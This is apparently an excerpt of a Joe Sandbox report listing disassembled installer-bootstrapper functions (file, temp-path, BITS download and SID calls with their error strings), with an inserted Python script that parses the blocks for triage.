                                                                                                                                                              • String ID: `<u
                                                                                                                                                              • API String ID: 347726874-3367579956
                                                                                                                                                              • Opcode ID: 75edba7e0d9d637b19ca64f27aefbe1f934a7780599efd24fcb3ac2852a6f147
                                                                                                                                                              • Instruction ID: b0342afee4b0e0d90dbec2c964ed9e2dee60e3df58b89eac1b202b0a767fe8e4
                                                                                                                                                              • Opcode Fuzzy Hash: 75edba7e0d9d637b19ca64f27aefbe1f934a7780599efd24fcb3ac2852a6f147
                                                                                                                                                              • Instruction Fuzzy Hash: 5A214C31A01219AFCB54DFA4CC58EAEBBBDFF48716F114158E801EB260D7319E05CB90
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _memcpy_s
                                                                                                                                                              • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                                                                                                                              • API String ID: 2001391462-1605196437
                                                                                                                                                              • Opcode ID: 18eae3b9579885f330fcdda4a073f0533acbe1a2027c16fa15816a0ac6961d8e
                                                                                                                                                              • Instruction ID: 2de9b11747fb9e96ccc76bc774d3c7d244ae98df50fbe9942e2e1af5ee7835b1
                                                                                                                                                              • Opcode Fuzzy Hash: 18eae3b9579885f330fcdda4a073f0533acbe1a2027c16fa15816a0ac6961d8e
                                                                                                                                                              • Instruction Fuzzy Hash: 3211C833280210B7EB952DAC9C8EF963B94FF16720F04415DFE10AB2D2DA6AC91097E1
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9E38
                                                                                                                                                              Strings
                                                                                                                                                              • File search: %ls, did not find path: %ls, xrefs: 007C9EA3
                                                                                                                                                              • Failed get file version., xrefs: 007C9E78
                                                                                                                                                              • Failed to format path string., xrefs: 007C9E43
                                                                                                                                                              • Failed to set variable., xrefs: 007C9E97
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open@16
                                                                                                                                                              • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                                                                                                                              • API String ID: 3613110473-2458530209
                                                                                                                                                              • Opcode ID: 6ee5076002bd6e4aa092d8d29f392d8822118cfe1715d5237f9a4e839f35797b
                                                                                                                                                              • Instruction ID: b5e7c4ae6e8531dd61d8d2ae55333cc19debe2249be2cc7405216b9915254750
                                                                                                                                                              • Opcode Fuzzy Hash: 6ee5076002bd6e4aa092d8d29f392d8822118cfe1715d5237f9a4e839f35797b
                                                                                                                                                              • Instruction Fuzzy Hash: 33118473D40128BACB42AAD48C45E9EFB78FF14760F10416DFE10A6251D7395E10AB91
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,007D8E17,0000001A,00000000,?,00000000,00000000), ref: 007D8258
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007D8E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 007D8262
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                                                                                                              • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                                                                                                                              • API String ID: 2186923214-2110050797
                                                                                                                                                              • Opcode ID: a66881d69715bfb8c55b15434f9ecc98cd49a2f9d0b4097038adb21f728a9ab4
                                                                                                                                                              • Instruction ID: f2bd95bfe02d7d2194acf6bc44b70ecd11aca5b63f3cbf4de81d9e8c3740ae4e
                                                                                                                                                              • Opcode Fuzzy Hash: a66881d69715bfb8c55b15434f9ecc98cd49a2f9d0b4097038adb21f728a9ab4
                                                                                                                                                              • Instruction Fuzzy Hash: 8701C232646A25A7D66166994C0AE9B6B6CEF41B70F11401FFD10EB380EE7CAD4045E5
                                                                                                                                                              APIs
                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 007EDDCE
                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EDDF8
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,007EDFC8,00000000,?,?,?,?,00000000), ref: 007EDE00
                                                                                                                                                              Strings
                                                                                                                                                              • bitsengine.cpp, xrefs: 007EDE24
                                                                                                                                                              • Failed while waiting for download., xrefs: 007EDE2E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                                                                                                                              • String ID: Failed while waiting for download.$bitsengine.cpp
                                                                                                                                                              • API String ID: 435350009-228655868
                                                                                                                                                              • Opcode ID: 2ec78c18a717446927194f298038d6ee8261a37b0f4713a4e85268574e73345b
                                                                                                                                                              • Instruction ID: 11779e3df629a58b01b1216f80ab6b639601ab69def3f804e6572cfffdb0393e
                                                                                                                                                              • Opcode Fuzzy Hash: 2ec78c18a717446927194f298038d6ee8261a37b0f4713a4e85268574e73345b
                                                                                                                                                              • Instruction Fuzzy Hash: 7A11CA7374627577D63096AA9C0DEDB7A9CEB08760F110125FE05FB281D6699D0085E4
                                                                                                                                                              APIs
                                                                                                                                                              • GetComputerNameW.KERNEL32(?,00000010), ref: 007C5F5C
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C5F66
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ComputerErrorLastName
                                                                                                                                                              • String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 3560734967-484636765
                                                                                                                                                              • Opcode ID: 37f300fb91c56f27828a78d118510e9f9b3c616e349f97d607e386a4671c4dc9
                                                                                                                                                              • Instruction ID: dbd1276fbe2159234172e98ebcbc51bfd192654674ca8f5f54834c695ea62980
                                                                                                                                                              • Opcode Fuzzy Hash: 37f300fb91c56f27828a78d118510e9f9b3c616e349f97d607e386a4671c4dc9
                                                                                                                                                              • Instruction Fuzzy Hash: 7111C632A41528ABD7259A949C05FDEB7E8EB08720F11411DFD00FB280DA69AE4486E1
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 007C67E3
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C67ED
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastPathTemp
                                                                                                                                                              • String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 1238063741-2915113195
                                                                                                                                                              • Opcode ID: 46d38a89c0244dd1c43f8902f480f34a7750d753bdff493334c35181f3466e81
                                                                                                                                                              • Instruction ID: 3bd3f090f240d83f808e70ef4d93a84b534275bffa6954d99032b77c716baa71
                                                                                                                                                              • Opcode Fuzzy Hash: 46d38a89c0244dd1c43f8902f480f34a7750d753bdff493334c35181f3466e81
                                                                                                                                                              • Instruction Fuzzy Hash: CA01DB72E42639A7D720AB545C4AFAA77D8AF04710F10416DFD14FB2C1EA689D0086D5
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 007C5EA6
                                                                                                                                                                • Part of subcall function 00800ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5EB2,00000000), ref: 00800AE0
                                                                                                                                                                • Part of subcall function 00800ACC: GetProcAddress.KERNEL32(00000000), ref: 00800AE7
                                                                                                                                                                • Part of subcall function 00800ACC: GetLastError.KERNEL32(?,?,?,007C5EB2,00000000), ref: 00800AFE
                                                                                                                                                                • Part of subcall function 00803D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00803D4C
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get shell folder., xrefs: 007C5EDA
                                                                                                                                                              • Failed to get 64-bit folder., xrefs: 007C5EF0
                                                                                                                                                              • variable.cpp, xrefs: 007C5ED0
                                                                                                                                                              • Failed to set variant value., xrefs: 007C5F0A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                                                                                                                              • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 2084161155-3906113122
                                                                                                                                                              • Opcode ID: 2e1d9436ab9834aec274f612e4887d6e3ae93d03b983e5279d2e77982037e1e2
                                                                                                                                                              • Instruction ID: 773ae3f2eef6994a31854a28e2be2539dac8991d9c386ce3b88537a73c58d8b0
                                                                                                                                                              • Opcode Fuzzy Hash: 2e1d9436ab9834aec274f612e4887d6e3ae93d03b983e5279d2e77982037e1e2
                                                                                                                                                              • Instruction Fuzzy Hash: 6C018C31945619F7DF166794CC0AF9E7B68FF00720F10415DF800F6180DB79AA809BE1
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00804440: FindFirstFileW.KERNEL32(007E923A,?,00000100,00000000,00000000), ref: 0080447B
                                                                                                                                                                • Part of subcall function 00804440: FindClose.KERNEL32(00000000), ref: 00804487
                                                                                                                                                              • SetFileAttributesW.KERNEL32(007E923A,00000080,00000000,007E923A,000000FF,00000000,?,?,007E923A), ref: 00804182
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007E923A), ref: 0080418C
                                                                                                                                                              • DeleteFileW.KERNEL32(007E923A,00000000,007E923A,000000FF,00000000,?,?,007E923A), ref: 008041AC
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007E923A), ref: 008041B6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 3967264933-2967768451
                                                                                                                                                              • Opcode ID: cf68a25e924d412d0f7016742637d72b3ad2dd3b5f24d671e61e8538c338370e
                                                                                                                                                              • Instruction ID: bacc279e8ee4a324a49bfe58762982c7dd24b7964f724d586e732677b1c5ed38
                                                                                                                                                              • Opcode Fuzzy Hash: cf68a25e924d412d0f7016742637d72b3ad2dd3b5f24d671e61e8538c338370e
                                                                                                                                                              • Instruction Fuzzy Hash: A001F5F2AC1636B7E7714AA99C04B5B7EA8FF24760F010210FE44EA2D0D7228D9085D0
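                                                                                                                                                              The function blocks in this section (API calls with their ref addresses and argument dumps, xref'd strings, memory dump source, similarity hashes) repeat for every function the IDA plugin recovered, which makes the listing hard to pivot on by hand. The parser below is an added example for triage, not Joe Sandbox code: it turns blocks in the layout shown on this page into records, strips the "Download File" link residue from the Associated lines, and answers two questions this section raises: which functions resolve imports at runtime through the GetModuleHandleW/GetProcAddress pair (the block carrying the "Failed to get 64-bit folder." string resolves IsWow64Process that way), and which functions share a given API. The SAMPLE text is constructed from lines of this report, shortened to two blocks. The LOADERS set and the heuristic that a symbol name pushed for GetProcAddress shows up in the argument dump of a neighbouring call (as "kernel32,IsWow64Process" does in the GetModuleHandleW line above) are the example's own assumptions, not documented report semantics.

```python
"""Parse the per-function "APIs / Strings / Memory Dump Source / Similarity"
blocks of a Joe Sandbox report. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Optional

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# "Part of subcall function X: Api.MODULE(args), ref: ADDR"  or  "Api.MODULE ref: ADDR"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<subfn>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+): (?P<val>.*)$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
# Assumed (example's own) list of APIs whose argument dumps carry module/symbol names.
LOADERS = {"GetProcAddress", "GetModuleHandleW", "GetModuleHandleA",
           "LoadLibraryW", "LoadLibraryA", "LoadLibraryExW", "LoadLibraryExA"}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str                        # call-site address printed after "ref:"
    args: list                      # raw argument/stack slots, "?" = unknown
    subcall_of: Optional[str] = None  # callee address for "Part of subcall function" hits


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # (text, xref address)
    meta: dict = field(default_factory=dict)      # key -> [values], e.g. "Opcode ID"

    def direct_apis(self):
        return [c.api for c in self.calls if c.subcall_of is None]

    def all_apis(self):
        return [c.api for c in self.calls]

    def opcode_id(self):
        return self.meta.get("Opcode ID", [None])[0]


def _clean(raw):
    """Drop indentation and the bullet the report prints in front of each item."""
    s = raw.strip()
    return s[1:].strip() if s.startswith("•") else s


def parse_blocks(text):
    """Split report text into FunctionBlocks; a block starts at each 'APIs' header."""
    blocks, current, section = [], None, None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionBlock()
                blocks.append(current)
            section = line
            continue
        if current is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                current.calls.append(ApiCall(m.group("api"), m.group("module"),
                                             m.group("ref"), args, m.group("subfn")))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                current.strings.append((m.group("text"), m.group("ref")))
        else:  # Memory Dump Source / IDA Plugin / Similarity are key: value lines
            m = KV_RE.match(line)
            if m:
                val = re.sub(r"Download File$", "", m.group("val")).strip()  # link residue
                current.meta.setdefault(m.group("key"), []).append(val)
    return blocks


def resolved_names(block):
    """Heuristic: non-address, non-'?' slots in loader-API dumps are module/symbol names."""
    names = []
    for c in block.calls:
        if c.api in LOADERS:
            for a in c.args:
                if a != "?" and not HEX_RE.match(a) and a not in names:
                    names.append(a)
    return names


def index_by_api(blocks):
    """api name -> sorted list of block indices that call it (directly or via subcall)."""
    index = {}
    for i, b in enumerate(blocks):
        for api in set(b.all_apis()):
            index.setdefault(api, []).append(i)
    return {k: sorted(v) for k, v in index.items()}


# Constructed from lines of this report (two blocks, shortened).
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(?), ref: 007C5EA6
  • Part of subcall function 00800ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5EB2,00000000), ref: 00800AE0
  • Part of subcall function 00800ACC: GetProcAddress.KERNEL32(00000000), ref: 00800AE7
  • Part of subcall function 00800ACC: GetLastError.KERNEL32(?,?,?,007C5EB2,00000000), ref: 00800AFE
  • Part of subcall function 00803D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00803D4C
Strings
• Failed to get shell folder., xrefs: 007C5EDA
• Failed to get 64-bit folder., xrefs: 007C5EF0
• variable.cpp, xrefs: 007C5ED0
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
• Opcode ID: 2e1d9436ab9834aec274f612e4887d6e3ae93d03b983e5279d2e77982037e1e2
APIs
  • Part of subcall function 00804440: FindFirstFileW.KERNEL32(007E923A,?,00000100,00000000,00000000), ref: 0080447B
  • Part of subcall function 00804440: FindClose.KERNEL32(00000000), ref: 00804487
• SetFileAttributesW.KERNEL32(007E923A,00000080,00000000,007E923A,000000FF,00000000,?,?,007E923A), ref: 00804182
• GetLastError.KERNEL32(?,?,007E923A), ref: 0080418C
• DeleteFileW.KERNEL32(007E923A,00000000,007E923A,000000FF,00000000,?,?,007E923A), ref: 008041AC
• GetLastError.KERNEL32(?,?,007E923A), ref: 008041B6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
Similarity
• API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
• String ID: fileutil.cpp
• Opcode ID: cf68a25e924d412d0f7016742637d72b3ad2dd3b5f24d671e61e8538c338370e
"""

if __name__ == "__main__":
    blocks = parse_blocks(SAMPLE)
    for i, b in enumerate(blocks):
        print(i, b.opcode_id(), b.direct_apis(), resolved_names(b))
    print(index_by_api(blocks).get("GetLastError"))
```

Feed the whole report text to parse_blocks and filter on resolved_names or index_by_api to find every function that loads symbols at runtime or shares an API with a block of interest; the Opcode ID per block can then be matched against other reports, since the listing prints the same hash for both Opcode ID and Opcode Fuzzy Hash.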
APIs
• EnterCriticalSection.KERNEL32(?), ref: 007EDA1A
• LeaveCriticalSection.KERNEL32(?), ref: 007EDA5F
• SetEvent.KERNEL32(?,?,?,?), ref: 007EDA73
Strings
• Failed to get state during job modification., xrefs: 007EDA33
• Failure while sending progress during BITS job modification., xrefs: 007EDA4E
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalSection$EnterEventLeave
• String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
• API String ID: 3094578987-1258544340
• Opcode ID: a3ff35d1442ccfb78e4e478db90f0fdbd2a1e08565a2a0df47ca8a069a5ac6de
• Instruction ID: 1ed25a8c5203c9fdec6f6bd498821fc390183d8be415bb55f8237d1b96be3348
• Opcode Fuzzy Hash: a3ff35d1442ccfb78e4e478db90f0fdbd2a1e08565a2a0df47ca8a069a5ac6de
• Instruction Fuzzy Hash: 0701DE72A06664FBCB21DB56D849AAEBBA8FF08321B008215E805D7600D738AE44CBD0
APIs
• EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,007EDDEE), ref: 007EDC92
• LeaveCriticalSection.KERNEL32(00000008,?,007EDDEE), ref: 007EDCD7
• SetEvent.KERNEL32(?,?,007EDDEE), ref: 007EDCEB
Strings
• Failure while sending progress., xrefs: 007EDCC6
• Failed to get BITS job state., xrefs: 007EDCAB
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalSection$EnterEventLeave
• String ID: Failed to get BITS job state.$Failure while sending progress.
• API String ID: 3094578987-2876445054
• Opcode ID: f22a8a9dd97e2c64aadab44d3a82c8a68adc9c0ebe47ead6cd7bcb326e2a2f5f
• Instruction ID: c653e13d4ce832ffd8c3f29e79ce7174bf3dbb2c54e29fe8b264d4ab4e53e3d7
• Opcode Fuzzy Hash: f22a8a9dd97e2c64aadab44d3a82c8a68adc9c0ebe47ead6cd7bcb326e2a2f5f
• Instruction Fuzzy Hash: 8D012472A02725FFCB229B46DC5999ABBACFF08360B100155F905D3660DB78ED10CBE4
APIs
• InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,007EDF52,?,?,?,?,?,?,00000000,00000000), ref: 007ED802
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,007EDF52,?,?,?,?,?,?,00000000,00000000), ref: 007ED80D
• GetLastError.KERNEL32(?,007EDF52,?,?,?,?,?,?,00000000,00000000), ref: 007ED81A
Strings
• bitsengine.cpp, xrefs: 007ED83E
• Failed to create BITS job complete event., xrefs: 007ED848
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CreateCriticalErrorEventInitializeLastSection
• String ID: Failed to create BITS job complete event.$bitsengine.cpp
• API String ID: 3069647169-3441864216
• Opcode ID: 76fe11dc367ba5c82a876f45b31ce3e5d5e724c9a3c9959f5d600708bd5e32cc
• Instruction ID: 93517f82a79d654598a02fd1574656b260656cefa8a3fd905507be37abfacb98
• Opcode Fuzzy Hash: 76fe11dc367ba5c82a876f45b31ce3e5d5e724c9a3c9959f5d600708bd5e32cc
• Instruction Fuzzy Hash: EE012576942636ABD3209F5ADC05A4BBFA8FF09760B014126FD18E7741D7B49850CBE4
APIs
• EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,007D7040,000000B8,00000000,?,00000000,75C0B390), ref: 007CD4B7
• InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 007CD4C6
• LeaveCriticalSection.KERNEL32(000000D0,?,007D7040,000000B8,00000000,?,00000000,75C0B390), ref: 007CD4DB
Strings
• Engine active cannot be changed because it was already in that state., xrefs: 007CD4FE
• userexperience.cpp, xrefs: 007CD4F4
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
• String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
• API String ID: 3376869089-1544469594
• Opcode ID: c9ed09e548ce2752b81814411a01f0cf9da1d429140826072f69b3e4633ca427
